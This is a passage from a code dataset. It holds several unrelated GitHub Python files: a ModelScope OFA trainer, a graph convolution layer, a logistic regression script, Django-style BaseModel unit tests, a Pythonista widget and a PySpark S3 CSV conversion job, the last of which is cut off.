`eval_dataset`.\n train_dataset (:obj:`MsDataset` or :obj:`Dataset`, **optional**, default to `None`):\n Dataset for training.\n eval_dataset (:obj:`MsDataset` or :obj:`Dataset`, **optional**, default to `None`):\n Dataset for evaluation.\n preprocessor (:obj:`Preprocessor`, **optional**, default to `None`):\n The optional preprocessor.\n NOTE: If the preprocessor has been called before the dataset fed into this trainer by user's custom code,\n this parameter should be None, meanwhile remove the 'preprocessor' key from the cfg_file.\n Else the preprocessor will be instantiated from the cfg_file or assigned from this parameter and\n this preprocessing action will be executed every time the dataset's __getitem__ is called.\n model_revision (`str`, **optional**, default to `None`):\n The revision used when the model_name_or_path is\n a model id of the remote hub. default `None`.\n seed (`int`, **optional**, default to `42`):\n The optional random seed for torch, cuda, numpy and random.\n \"\"\"\n\n def __init__(\n self,\n model: Optional[Union[TorchModel, nn.Module, str]] = None,\n cfg_file: Optional[str] = None,\n cfg_modify_fn: Optional[Callable] = None,\n arg_parse_fn: Optional[Callable] = None,\n data_collator: Optional[Union[Callable, Dict[str,\n Callable]]] = None,\n train_dataset: Optional[Union[MsDataset, Dataset]] = None,\n eval_dataset: Optional[Union[MsDataset, Dataset]] = None,\n preprocessor: Optional[Union[Preprocessor,\n Dict[str, Preprocessor]]] = None,\n optimizers: Tuple[torch.optim.Optimizer,\n torch.optim.lr_scheduler._LRScheduler] = (None,\n None),\n model_revision: Optional[str] = DEFAULT_MODEL_REVISION,\n seed: int = 42,\n **kwargs):\n model = Model.from_pretrained(\n model, revision=model_revision, invoked_by=Invoke.TRAINER)\n model_dir = model.model_dir\n self.cfg_modify_fn = cfg_modify_fn\n\n work_dir = kwargs.get('work_dir', 'workspace')\n os.makedirs(work_dir, exist_ok=True)\n ignore_file_set = set()\n if cfg_file is not None:\n cfg_file = self.get_config_file(cfg_file)\n dst = os.path.abspath(\n os.path.join(work_dir, ModelFile.CONFIGURATION))\n src = os.path.abspath(cfg_file)\n if src != dst:\n shutil.copy(src, work_dir)\n ignore_file_set.add(ModelFile.CONFIGURATION)\n recursive_overwrite(\n model_dir, work_dir, ignore=ignore_patterns(*ignore_file_set))\n cfg_file = os.path.join(work_dir, ModelFile.CONFIGURATION)\n cfg = self.rebuild_config(Config.from_file(cfg_file))\n if cfg_modify_fn is not None:\n cfg = self.cfg_modify_fn(cfg)\n with open(cfg_file, 'w') as writer:\n json.dump(dict(cfg), fp=writer, indent=4)\n if preprocessor is None:\n preprocessor = {\n ConfigKeys.train:\n OfaPreprocessor(\n model_dir=work_dir, mode=ModeKeys.TRAIN, no_collate=True),\n ConfigKeys.val:\n OfaPreprocessor(\n model_dir=work_dir, mode=ModeKeys.EVAL, no_collate=True),\n }\n # use torchrun launch\n world_size = int(os.environ.get('WORLD_SIZE', 1))\n epoch_steps = math.ceil(\n len(train_dataset) / # noqa\n (cfg.train.dataloader.batch_size_per_gpu * world_size)) # noqa\n cfg.train.lr_scheduler.num_train_steps = epoch_steps * cfg.train.max_epochs\n cfg.train.criterion.tokenizer = model.tokenizer\n self.criterion = AdjustLabelSmoothedCrossEntropyCriterion(\n cfg.train.criterion)\n if optimizers[0] is None:\n optimizer = build_optimizer(model, cfg=cfg.train.optimizer)\n else:\n optimizer = optimizers[0]\n if optimizers[1] is None:\n scheduler_class, scheduler_args = get_schedule(\n cfg.train.lr_scheduler)\n if scheduler_class is not None:\n lr_scheduler = scheduler_class(**{'optimizer': optimizer},\n **scheduler_args)\n else:\n lr_scheduler = None\n else:\n lr_scheduler = optimizers[1]\n optimizers = (optimizer, lr_scheduler)\n if data_collator is None:\n data_collator = partial(\n collate_fn,\n pad_idx=model.tokenizer.pad_token_id,\n eos_idx=model.tokenizer.eos_token_id,\n )\n if 'launcher' not in kwargs and cfg.train.get('launcher', None):\n kwargs['launcher'] = cfg.train.launcher\n if 'use_fp16' not in kwargs and cfg.train.get('use_fp16', False):\n kwargs['use_fp16'] = cfg.train.use_fp16\n kwargs['to_tensor'] = False\n super().__init__(\n model=model,\n cfg_file=cfg_file,\n arg_parse_fn=arg_parse_fn,\n cfg_modify_fn=cfg_modify_fn,\n data_collator=data_collator,\n train_dataset=train_dataset,\n eval_dataset=eval_dataset,\n preprocessor=preprocessor,\n optimizers=optimizers,\n seed=seed,\n **kwargs,\n )\n\n def rebuild_config(self, cfg: Config):\n r\"\"\"\n rebuild config if `cfg_modify_fn` is not `None`.\n \"\"\"\n if self.cfg_modify_fn is not None:\n cfg = self.cfg_modify_fn(cfg)\n return cfg\n\n def get_config_file(self, config_file: str):\n r\"\"\"\n support local file/ url or model_id with revision\n \"\"\"\n if os.path.exists(config_file):\n return config_file\n else:\n temp_name = tempfile.TemporaryDirectory().name\n if len(config_file.split('#')) == 2:\n model_id = config_file.split('#')[0]\n revision = config_file.split('#')[-1].split('=')[-1]\n else:\n model_id = config_file\n revision = DEFAULT_MODEL_REVISION\n file_name = model_file_download(\n model_id,\n file_path=ModelFile.CONFIGURATION,\n revision=revision,\n cache_dir=temp_name)\n return file_name\n\n def train_step(self, model, inputs):\n r\"\"\"\n A single training step.\n\n step 1. Let the model in a trainable state.\n step 2. Execute the criterion function.\n step 3. Update the logging variable's value.\n step 4. Update the training result.\n\n Args:\n model (:obj:`torch.nn.Module` or :obj:`TorchModel`): The model to be run.\n inputs (`dict`): model inputs.\n \"\"\"\n model = model.module if self._dist or is_parallel(model) else model\n model.train()\n loss, sample_size, logging_output = self.criterion(model, inputs)\n train_outputs = {'loss': loss}\n # add model output info to log\n if 'log_vars' not in train_outputs:\n default_keys_pattern = ['loss']\n match_keys = set([])\n for key_p in default_keys_pattern:\n match_keys.update(\n [key for key in train_outputs.keys() if key_p in key])\n log_vars = {}\n for key in match_keys:\n value = train_outputs.get(key, None)\n if value is not None:\n if dist.is_available() and dist.is_initialized():\n value = value.data.clone()\n dist.all_reduce(value.div_(dist.get_world_size()))\n log_vars.update({key: value.item()})\n self.log_buffer.update(log_vars)\n else:\n self.log_buffer.update(train_outputs['log_vars'])\n self.train_outputs = train_outputs\n","repo_name":"modelscope/modelscope","sub_path":"modelscope/trainers/multi_modal/ofa/ofa_trainer.py","file_name":"ofa_trainer.py","file_ext":"py","file_size_in_byte":10135,"program_lang":"python","lang":"en","doc_type":"code","stars":4825,"dataset":"github-code","pt":"16"} +{"seq_id":"38415594294","text":"import torch\nimport torch.nn.functional as F\nimport torch.nn as nn\nfrom scipy.sparse.linalg import eigs\nfrom model.att import AttLayer\n\nclass AVWGCN(nn.Module):\n def __init__(self, cheb_polynomials, L_tilde, dim_in, dim_out, cheb_k, embed_dim):\n super(AVWGCN, self).__init__()\n self.cheb_k = cheb_k\n self.cheb_polynomials = cheb_polynomials\n self.L_tilde = L_tilde\n self.weights_pool = nn.Parameter(torch.FloatTensor(embed_dim, cheb_k, dim_in, dim_out))\n self.bias_pool = nn.Parameter(torch.FloatTensor(embed_dim, dim_out))\n \n # for existing graph convolution\n # self.init_gconv = nn.Conv1d(dim_in, dim_out, kernel_size=5, padding=0)\n self.init_gconv = nn.Linear(dim_in, dim_out)\n self.gconv = nn.Linear(dim_out * cheb_k, dim_out)\n self.dy_gate1 = AttLayer(dim_out)\n self.dy_gate2 = AttLayer(dim_out)\n\n def forward(self, x, node_embeddings, L_tilde_learned):\n #x shaped[B, N, C], node_embeddings shaped [N, D] -> supports shaped [N, N]\n #output shape [B, N, C]\n b, n, _ = x.shape\n # 0) learned cheb_polynomials\n node_num = node_embeddings.shape[0]\n\n # L_tilde_learned = F.softmax(F.relu(torch.mm(node_embeddings, node_embeddings.transpose(0, 1))), dim=1)\n # L_tilde_learned = torch.matmul(L_tilde_learned, self.L_tilde) * L_tilde_learned\n\n support_set = [torch.eye(node_num).to(L_tilde_learned.device), L_tilde_learned]\n #default cheb_k = 3\n for k in range(2, self.cheb_k):\n support_set.append(torch.matmul(2 * L_tilde_learned, support_set[-1]) - support_set[-2])\n\n # 1) convolution with learned graph convolution (implicit knowledge)\n supports = torch.stack(support_set, dim=0)\n weights = torch.einsum('nd,dkio->nkio', node_embeddings, self.weights_pool) #N, cheb_k, dim_in, dim_out\n bias = torch.matmul(node_embeddings, self.bias_pool) #N, dim_out\n x_g = torch.einsum(\"knm,bmc->bknc\", supports, x) #B, cheb_k, N, dim_in\n x_g = x_g.permute(0, 2, 1, 3) # B, N, cheb_k, dim_in\n x_gconv0 = torch.einsum('bnki,nkio->bno', x_g, weights) + bias #b, N, dim_out\n\n # 2) convolution with existing graph (explicit knowledge)\n graph_supports = torch.stack(self.cheb_polynomials, dim=0) # [k, n, m]\n x = self.init_gconv(x)\n x_g1 = torch.einsum(\"knm,bmc->bknc\", graph_supports, x)\n x_g1 = x_g1.permute(0, 2, 1, 3).reshape(b, n, -1) # B, N, cheb_k, dim_in\n x_gconv1 = self.gconv(x_g1)\n\n # 3) fusion of explit knowledge and implicit knowledge\n x_gconv = self.dy_gate1(F.leaky_relu(x_gconv0).transpose(1,2)) + self.dy_gate2(F.leaky_relu(x_gconv1).transpose(1,2))\n # x_gconv = F.leaky_relu(x_gconv0) + F.leaky_relu(x_gconv1)\n \n return x_gconv.transpose(1,2)\n","repo_name":"ant-research/RGSL","sub_path":"model/RGCN.py","file_name":"RGCN.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"16"} +{"seq_id":"34090235693","text":"import numpy as np\nimport pandas as pd\nimport sys\nimport json\nimport time\nfrom keras.models import Sequential\nfrom keras.layers.recurrent import LSTM, SimpleRNN, GRU\nfrom keras.layers import Dense, Dropout, Activation\nfrom os import getcwd, environ, listdir, mkdir, path\nfrom keras.optimizers import rmsprop\nfrom keras.utils.np_utils import to_categorical\nfrom keras.models import load_model\nfrom sklearn.metrics import accuracy_score, recall_score, precision_score, f1_score\nfrom sklearn.externals import joblib\nfrom scipy.ndimage import convolve\nfrom sklearn import linear_model, datasets, metrics\n#from sklearn.model_selection import train_test_split\nfrom sklearn.neural_network import BernoulliRBM\nfrom sklearn.pipeline import Pipeline\n\n\n\nclass logistic(object):\n \n def setColumns(self):\n \n # Load Datad\n self.PATH = getcwd()\n f = open(self.PATH + '/data/' + sys.argv[1] + '/' + sys.argv[1] + '.info', 'r')\n p = open(self.PATH + '/data/' + sys.argv[1] + '/' + sys.argv[1] + '.param', 'r')\n columns = f.read().splitlines()\n t = json.load(p)\n \n self.in_learning_rate = float(t['learning_rate'])\n self.label_name = t['target']\n #self.in_n_iter = int(t['n_iter'])\n #self.in_n_components = int(t['n_components'])\n #self.in_logistic_c = float(t['logistic_c'])\n #self.in_learning_rate = 0.01\n #self.in_n_iter = 30\n #self.in_n_components = 63\n #self.in_logistic_c = 6000.0\n #self.label_name = 'label'\n\n #f.close()\n #p.close()\n\n def pre_processing_for_data(self, data_file_path):\n \n #read data\n data_pd = pd.read_csv(data_file_path)\n #assign features \n features_pd = data_pd\n #features_pd = features_pd.drop('label',1)\n \n if self.label_name in features_pd:\n features_pd = features_pd.drop(self.label_name,1)\n \n self.data_dim = len(features_pd.columns)\n self.in_n_components = len(features_pd.columns)\n self.samples = len(features_pd)\n #crate input data\n X_val = np.array(features_pd)\n #adjust_offset_value = len(X_val)-(len(X_val) % self.timesteps)\n #X_val = X_val[0:adjust_offset_value]\n #X_val = X_val.reshape(-1, self.timesteps, self.data_dim)\n #assign label\n #label_pd = data_pd['label']\n if self.label_name is not None:\n if self.label_name in data_pd:\n label_pd = data_pd[self.label_name]\n #calculate label list\n label_list = list(set(np.reshape(label_pd.values,(-1,))))\n #create output data\n #Y_val = []\n #loop for number of data\n #for count, i in enumerate(label_pd):\n # idx = find_matching_index(label_list,i)\n # Y_val.append(np.reshape(vectorized_Y_data(idx,len(label_list)),(-1,)))\n Y_val = np.array(label_pd)\n #Y_val = to_categorical(Y_val)\n else:\n Y_val = 0\n else:\n Y_val = 0\n \n #print(np.shape(X_val))\n #print(np.shape(Y_val))\n return X_val, Y_val\n\n \n def training(self):\n #init network configuration\n self.setColumns()\n #preprocessing data\n #X_train, Y_train = self.pre_processing_for_data(str(self.PATH + '/py/rbm/test.csv'))\n X_train, Y_train = self.pre_processing_for_data(str(self.PATH + '/data/' + sys.argv[1] + '/' + sys.argv[1] + '.csv'))\n \n \n #create model\n logistic = linear_model.LogisticRegression()\n \n logistic.C = self.in_learning_rate\n \n logistic.fit(X_train, Y_train)\n \n acc, recall, precision, f1_score = cal_matrics(logistic, X_train, Y_train)\n\n \n model_name = 'train_'+time.strftime(\"%Y%m_%d_%H_%M\", time.localtime())\n #save\n out = open(self.PATH + '/data/' + sys.argv[1] + '/' + sys.argv[1] + '.out', 'w')\n json.dump({'ntb':\n {\n 'model_name' : model_name,\n 'samples' : self.samples,\n 'accuracy' : acc,\n 'recall' : recall,\n 'precision' : precision,\n 'f1_score' : f1_score\n }\n ,\n 'tb': \n {\n #'predict' :\n }\n }, out, separators=(',',':'))\n \n if not path.exists(self.PATH + '/data/' + sys.argv[1] + '/' + model_name):\n mkdir(self.PATH + '/data/' + sys.argv[1] + '/' + model_name)\n joblib.dump(logistic, self.PATH + '/data/' + sys.argv[1] + '/' + model_name + '/' + sys.argv[1] + '.pkl')\n \n out.close()\n \n def test(self):\n \n #init network configuration\n self.setColumns()\n #preprocessing data\n #X_train, Y_train = self.pre_processing_for_data(str(self.PATH + '/py/rbm/test.csv'))\n X_train, Y_train = self.pre_processing_for_data(str(self.PATH + '/data/' + sys.argv[1] + '/' + sys.argv[1] + '.csv'))\n \n logistic_classifier = joblib.load(self.PATH + '/data/' + sys.argv[1] + '/' + sys.argv[3] + '/' + sys.argv[1] + '.pkl')\n \n # Trainig result\n #RBM_result = metrics.classification_report(\n # Y_train,\n # classifier.predict(X_train))\n acc, recall, precision, f1_score = cal_matrics(logistic_classifier, X_train, Y_train)\n \n #print()\n #print(\"Logistic regression using RBM features:\\n%s\\n\" % Logistic_result)\n \n test = open(self.PATH + '/data/' + sys.argv[1] + '/test/' + sys.argv[2] + '.test', 'w')\n json.dump({'ntb':\n {\n 'samples' : self.samples,\n 'accuracy' : acc,\n 'recall' : recall,\n 'precision' : precision,\n 'f1_score' : f1_score\n }\n ,\n 'tb': \n {\n #'predict' :\n }\n }, test, separators=(',',':'))\n test.close()\n \n def request(self):\n\n #init network configuration\n self.setColumns()\n #preprocessing data\n #X_train, Y_train = self.pre_processing_for_data(str(self.PATH + '/py/rbm/test.csv'))\n X_train, _ = self.pre_processing_for_data(str(self.PATH + '/data/' + sys.argv[1] + '/request/' + sys.argv[2] + '.csv'))\n \n logistic_classifier = joblib.load(self.PATH + '/data/' + sys.argv[1] + '/' + sys.argv[3] + '/' + sys.argv[1] + '.pkl')\n \n # Trainig result\n P = logistic_classifier.predict(X_train)\n \n prediction_array = []\n for i in P:\n prediction_array.append(i)\n \n \n req = open(self.PATH + '/data/' + sys.argv[1] + '/request/' + sys.argv[2] + '.req', 'w')\n json.dump({'ntb':\n {\n 'samples' : self.samples\n }\n ,\n 'tb': \n {\n 'predict' : prediction_array\n }\n }, req, separators=(',',':'))\n req.close()\n\n\ndef cal_matrics(model, X, Y):\n \n predict = model.predict(X)\n \n acc = metrics.accuracy_score(\n Y,\n predict, normalize=False,sample_weight=None)\n\n recall = metrics.recall_score(\n Y,\n predict, average='micro')\n \n precision = metrics.precision_score(\n Y,\n predict, average='micro')\n \n f1_score = metrics.f1_score(\n Y,\n predict,average='micro')\n \n return acc, recall, precision, f1_score\n\n\ndef find_matching_index(src, dst):\n for i in range(0, len(src)):\n if src[i] == dst:\n return i\n return -1\n\ndef vectorized_Y_data(j,label_num):\n e = np.zeros((label_num, 1))\n e[j] = 1.0\n return e[:]\n\ndef main():\n mylogistic = logistic()\n mylogistic.training()\n# mylogistic.test()\n# mylogistic.request()\n\nif __name__ == \"__main__\":\n main()\n\n\n","repo_name":"myeongkil/Intelligent_cognitive_framework","sub_path":"py/logistic/logistic.py","file_name":"logistic.py","file_ext":"py","file_size_in_byte":8211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21728660798","text":"from method import method\nfrom helpers import db\nimport time\n\nclass unsubscribeGetMethod(method):\n\n def __init__(self, request, running):\n checks = [\"key\", \"line\", \"token\", \"active\"]\n super(unsubscribeGetMethod, self).__init__(request, running, checks)\n if not self.error:\n self.run()\n \n def run(self):\n self._log(\"unsubscribeGet\")\n db.Lines.update({\"_id\": self.line[\"_id\"], \"tokens.key\": self.token[\"key\"]}, {\"$set\": {\"tokens.$.active\": False}})\n if self.token[\"key\"] in self.running[self.line[\"_id\"]][\"tokens\"]:\n self.running[self.line[\"_id\"]][\"tokens\"].remove(self.token[\"key\"])\n if len(self.running[self.line[\"_id\"]][\"tokens\"]) < 1:\n db.Lines.update({\"_id\": self.line[\"_id\"]}, {\"$set\": {\"reconnect\": False, \"active\": False}})\n if self.line[\"_id\"] in self.running:\n del self.running[self.line[\"_id\"]]\n self.wa.logout()\n self._success()\n","repo_name":"aitoehigie/whatools-api","sub_path":"methods/unsubscribe.py","file_name":"unsubscribe.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23913497445","text":"import appex\nimport ui\nimport random\nfrom time import time\n\nstartTime = 0\nisRunning = False\n\n\ndef start(sender):\n\tglobal isRunning\n\tglobal startTime\n\n\tif isRunning:\n\t\tnow = time() - startTime\n\t\tsecs = now % 60.0\n\t\tlightSpeed = 340\n\t\tdistance = secs * lightSpeed\n\n\t\tsender.superview['button_label'].title = \"►\"\n\t\tsender.superview['result_label'].title = str(int(distance)) + \"m\"\n\t\tisRunning = False\n\n\telse:\n\t\tsender.superview['button_label'].title = \"◼\"\n\t\tsender.superview['result_label'].title = \"Counting\"\n\n\t\tstartTime = time()\n\t\tisRunning = True\n\n\ndef reset(sender):\n\tglobal startTime\n\tglobal isRunning\n\n\tstartTime = 0\n\tisRunning = False\n\tsender.superview['result_label'].title = \"\"\n\n\nv = ui.View(frame=(0, 0, 300, 110))\n\nlabel = ui.Button(\n\tframe=(150, 0, 150, 100),\n\tflex='lwh',\n\tfont=('<System>', 24),\n\talignment=ui.ALIGN_RIGHT,\n\taction=reset,\n\tname='result_label')\nv.add_subview(label)\n\nbutton = ui.Button(\n\ttitle='►',\n\tfont=('<System>', 24),\n\tflex='rwh',\n\taction=start,\n\tname='button_label')\nbutton.frame = (20, 25, 50, 50)\nv.add_subview(button)\n\nappex.set_widget_view(v)\n","repo_name":"excalith/pythonista","sub_path":"Thunder.py","file_name":"Thunder.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"13776751615","text":"#!/usr/bin/python3\n\"\"\" DEfinition of the Unittest module for ‘BaseModel’ class \"\"\"\n\nimport json\nimport re\nimport os\nimport time\nimport uuid\nimport unittest\nfrom models.base_model import BaseModel\nfrom datetime import datetime\nfrom models import storage\nfrom models.engine.file_storage import FileStorage\n\n\nclass TestBaseModel(unittest.TestCase):\n \"\"\" The following are the test cases for the Basemodel class \"\"\"\n\n def setUp(self):\n \"\"\" This is for setting up test methods.\"\"\"\n pass\n\n def tearDown(self):\n \"\"\"This is for tearing down test methods.\"\"\"\n self.clearStorageData()\n pass\n\n def clearStorageData(self):\n \"\"\" This is for resetting FileStorage data.\"\"\"\n FileStorage._FileStorage__objects = {}\n if os.path.isfile(FileStorage._FileStorage__file_path):\n os.remove(FileStorage._FileStorage__file_path)\n\n def test_instantiate(self):\n \"\"\" This is to test instantiation of BaseModel class\"\"\"\n\n # Create a BaseModel instance\n bm = BaseModel()\n\n # Assert that the instance is of the expected type\n self.assertEqual(\n str(type(bm)),\n \"<class 'models.base_model.BaseModel'>\"\n )\n\n # Assert that the instance is an instance of BaseModel\n self.assertIsInstance(bm, BaseModel)\n\n # Assert that the instance's type is a subclass of BaseModel\n self.assertTrue(issubclass(type(bm), BaseModel))\n\n def test_init_no_args(self):\n \"\"\" This is to test __init__ with no arguments\"\"\"\n self.clearStorageData()\n\n # Check that trying to create an instance with no args raises an error\n with self.assertRaises(TypeError) as e:\n BaseModel.__init__()\n error_msg = \"__init__() missing 1 required positional argument: 'self'\"\n self.assertEqual(str(e.exception), error_msg)\n\n def test_init_many_args(self):\n \"\"\"This is to test __init__ with many arguments.\"\"\"\n self.clearStorageData()\n\n # Create a list of arguments\n args = [arg for arg in range(10)]\n\n # Create a BaseModel instance with many arguments\n bm = BaseModel(*args)\n\n def test_attributes(self):\n \"\"\"This is totest attributes value for instance of a BaseModel class\"\"\"\n\n # Get the attributes for the BaseModel class\n attrs = storage.attributes()[\"BaseModel\"]\n\n # Create a BaseModel instance\n obj = BaseModel()\n\n # Check if the instance has the expected attributes & their typesmatch\n for attr_name, attr_type in attrs.items():\n self.assertTrue(hasattr(obj, attr_name))\n self.assertEqual(type(getattr(obj, attr_name, None)), attr_type)\n\n def test_datetime_created(self):\n \"\"\"This is to test if updated_at & created_at\n are current at creation\"\"\"\n\n # Get the current date and time\n current_time = datetime.now()\n\n # Create a BaseModel instance\n bm = BaseModel()\n\n # Calculate the time difference between updated_at and created_at\n time_diff = bm.updated_at - bm.created_at\n\n # Check that the time difference is within an acceptable range\n self.assertTrue(abs(time_diff.total_seconds()) < 0.01)\n\n # Calculate the time difference between created_at and the current date\n time_diff = bm.created_at - current_time\n\n # Check that the time difference is within an acceptable range\n self.assertTrue(abs(time_diff.total_seconds()) < 0.1)\n\n def test_id(self):\n \"\"\"This is to test for unique user ids.\"\"\"\n\n # Create a list of BaseModel IDs\n id_list = [BaseModel().id for _ in range(1000)]\n\n # Check that all IDs in the list are unique\n self.assertEqual(len(set(id_list)), len(id_list))\n\n def test_save(self):\n \"\"\"This is to test the public instance method save().\"\"\"\n\n # Create a BaseModel instance\n bm = BaseModel()\n\n # Sleep to create a time gap\n time.sleep(0.5)\n\n # Get the current date and time\n current_time = datetime.now()\n\n # Call the save() method\n bm.save()\n\n # Calculate the time difference between updated_at and the current date\n time_diff = bm.updated_at - current_time\n\n # Check that the time difference is within an acceptable range\n self.assertTrue(abs(time_diff.total_seconds()) < 0.01)\n\n def test_str(self):\n \"\"\"This is to test for __str__ method.\"\"\"\n\n # Create a BaseModel instance\n bm = BaseModel()\n\n # Define a regular expression pattern to match the str representation\n regex = re.compile(r\"^\\[(.*)\\] \\((.*)\\) (.*)$\")\n\n # Match the string representation against the pattern\n result = regex.match(str(bm))\n\n # Check that the match is not None\n self.assertIsNotNone(result)\n\n # Check that the first group in the match is \"BaseModel\"\n self.assertEqual(result.group(1), \"BaseModel\")\n\n # Check that the second group in the match is the BaseModel's ID\n self.assertEqual(result.group(2), bm.id)\n\n # Extract 3rdgroup and replace single quotes with\n # double quotes for JSON compatibility\n\n str_data = result.group(3)\n str_data = re.sub(r\"(datetime\\.datetime\\([^)]*\\))\", \"'\\\\1'\", str_data)\n data = json.loads(str_data.replace(\"'\", '\"'))\n\n # Create a dictionary from the BaseModel's __dict__\n # & format date attributes\n obj_data = bm.__dict__.copy()\n obj_data[\"created_at\"] = repr(obj_data[\"created_at\"])\n obj_data[\"updated_at\"] = repr(obj_data[\"updated_at\"])\n\n # Check that the data from the string representation matches\n # the BaseModel's attributes\n\n self.assertEqual(data, obj_data)\n\n def test_to_dict(self):\n \"\"\"This is to test the public instance method to_dict().\"\"\"\n\n # Create a BaseModel instance\n bm = BaseModel()\n\n # Set some attributes\n bm.name = \"ModelName\"\n bm.age = 25\n\n # Convert the BaseModel instance to a dictionary\n data = bm.to_dict()\n\n # Check that the dictionary contains the expected data\n self.assertEqual(data[\"id\"], bm.id)\n self.assertEqual(data[\"__class__\"], type(bm).__name__)\n self.assertEqual(data[\"created_at\"], bm.created_at.isoformat())\n self.assertEqual(data[\"updated_at\"], bm.updated_at.isoformat())\n self.assertEqual(data[\"name\"], bm.name)\n self.assertEqual(data[\"age\"], bm.age)\n\n def test_to_dict_no_args(self):\n \"\"\"This is to test to_dict() with no arguments.\"\"\"\n self.clearStorageData()\n\n # Check that trying to call to_dict() with no arguments raises an error\n with self.assertRaises(TypeError) as e:\n BaseModel.to_dict()\n error_msg = \"to_dict() missing 1 required positional argument: 'self'\"\n self.assertEqual(str(e.exception), error_msg)\n\n def test_to_dict_excess_args(self):\n \"\"\"This is to test to_dict() with too many arguments.\"\"\"\n self.clearStorageData()\n\n # Check that trying to call to_dict()\n # with too many args raises an error\n with self.assertRaises(TypeError) as e:\n BaseModel.to_dict(self, 98)\n error_msg = \"to_dict() takes 1 positional argument but 2 were given\"\n self.assertEqual(str(e.exception), error_msg)\n\n def test_instantiate_kwargs(self):\n \"\"\"This is to test instantiation with **kwargs.\"\"\"\n\n # Create a BaseModel instance\n model = BaseModel()\n\n # Set some attributes\n model.extra_info = \"ExtraInfo\"\n model.rating = 5\n\n # Convert the BaseModel instance to a dictionary\n model_json = model.to_dict()\n\n # Create a new BaseModel instance from the dictionary\n new_model = BaseModel(**model_json)\n\n # Check that the attributes of the new instance\n # match the original instance\n self.assertEqual(new_model.to_dict(), model.to_dict())\n\n def test_instantiate_dict(self):\n \"\"\"This is to test instantiation with **kwargs from custom dict.\"\"\"\n\n # Create a custom dictionary with attributes\n custom_dict = {\n \"__class__\": \"BaseModel\",\n \"updated_at\": datetime(\n 2039, 18, 20, 43, 59, 59, 13579\n ).isoformat(),\n \"created_at\": datetime.now().isoformat(),\n \"id\": uuid.uuid4(),\n \"custom_attr\": \"CustomValue\",\n \"int_attr\": 42,\n \"float_attr\": 3.1416\n }\n\n # Create a BaseModel instance using the custom dictionary\n obj = BaseModel(**custom_dict)\n\n # Check that the attributes of the instance match the custom dictionary\n self.assertEqual(obj.to_dict(), custom_dict)\n\n def test_save_storage(self):\n \"\"\"This is to test that storage.save() is called from save().\"\"\"\n self.clearStorageData()\n\n # Create a BaseModel instance\n bm = BaseModel()\n\n # Call the save() method\n bm.save()\n\n # Create a key for the object in the storage format\n key = \"{}.{}\".format(type(bm).__name__, bm.id)\n\n # Create a dictionary with the object's data\n data = {key: bm.to_dict()}\n\n # Check that the file storage file exists\n self.assertTrue(os.path.isfile(FileStorage._FileStorage__file_path))\n\n # Check that the data in the file matches the expected data\n with open(\n FileStorage._FileStorage__file_path, \"r\", encoding=\"utf-8\"\n ) as f:\n self.assertEqual(len(f.read()), len(json.dumps(data)))\n f.seek(0)\n self.assertEqual(json.load(f), data)\n\n def test_save_no_args(self):\n \"\"\"This is to test save() with no arguments.\"\"\"\n self.clearStorageData()\n\n # Check that trying to call save() with no arguments raises an error\n with self.assertRaises(TypeError) as e:\n BaseModel.save()\n error_msg = \"save() missing 1 required positional argument: 'self'\"\n self.assertEqual(str(e.exception), error_msg)\n\n def test_save_excess_args(self):\n \"\"\"This is to test save() with too many arguments.\"\"\"\n self.clearStorageData()\n\n # Check that trying to call save() with too many args raises an error\n with self.assertRaises(TypeError) as e:\n BaseModel.save(self, 98)\n error_msg = \"save() takes 1 positional argument but 2 were given\"\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"nadiaMahfoud/AirBnB_clone","sub_path":"tests/test_models/test_base_model.py","file_name":"test_base_model.py","file_ext":"py","file_size_in_byte":10602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73739475529","text":"# -*- coding: utf-8 -*-\n\nimport argparse\nimport logging\n\nfrom client_s3 import clientS3\nimport client_spark\n\nparser = argparse.ArgumentParser(prog=\"Projeto Florestas Plantadas - Converter Arquivo CSV\",\n description=\"Job converter arquivos\")\n\nparser.add_argument(\"-f\", \"--filename\")\n\ntry:\n args = parser.parse_args()\n nomeArquivoCompactado = args.filename\n\n BUCKET_RAW = \"snif-florestal-raw\"\n BUCKET_STAGE = \"snif-florestal-stage\"\n BUCKET_ANALYTICS = \"snif-florestal-analytics\"\n\n objetosS3 = clientS3.list_objects(Bucket=BUCKET_RAW)\n\n for obj in objetosS3.get(\"Contents\"):\n chave = obj[\"Key\"]\n ano, mes, dia, etapa, nomeArquivo = chave.split(\"/\")\n\n if etapa == \"downloaded\":\n diretorioArquivoCSV = nomeArquivo[:-4]\n\n logging.info(f\"Lendo arquivo arquivo {chave}\")\n spark_client = client_spark.obterSparkClient(f\"convert-{diretorioArquivoCSV}\")\n\n dfArquivo = spark_client \\\n .read \\\n .csv(f\"s3a://{BUCKET_RAW}/{chave}\", sep=\";\", header=True, encoding=\"iso-8859-1\") \\\n .withColumnsRenamed(\n {\n \"Ano\": \"data_base\",\n \"Ano_PEVS\": \"ano_data_base\",\n \"Região\": \"regiao\",\n \"Nome UF\": \"nome_uf\",\n \"Sigla UF\": \"sigla_uf\",\n \"Código Microrregião\": \"codigo_microrregiao\",\n \"Nome Microrregião\": \"nome_microrregiao\",\n \"Microrregião Geográfica\": \"microrregiao\",\n \"Código Município Completo\": \"codigo_municipio\",\n \"Município\": \"municipio\",\n \"Município Geográfico\": \"municipio_geografico\",\n \"Espécie florestal\": \"especie_florestal\",\n \"Área (ha)\": \"area_ha\"\n })\\\n .na.fill(value=\"0\",subset=[\"area_ha\"])\n\n logging.info(f\"Total registros no arquivo: {dfArquivo.count()}\")\n print(\"===========================================\")\n dfArquivo.show(5)\n print(\"===========================================\")\n\n logging.info(f\"Salvando arquivo {nomeArquivo} no bucket stage no formato *.csv...\")\n\n dfArquivo.write.csv(\n path=f\"s3a://{BUCKET_STAGE}/{diretorioArquivoCSV}\",\n mode=\"overwrite\",\n header=True,\n sep=\",\")\n\n logging.info(f\"Arquivo {nomeArquivo} salvo no bucket stage [{BUCKET_STAGE}/{diretorioArquivoCSV}].\")\n\n logging.info(f\"Salvando arquivo {nomeArquivo} no bucket 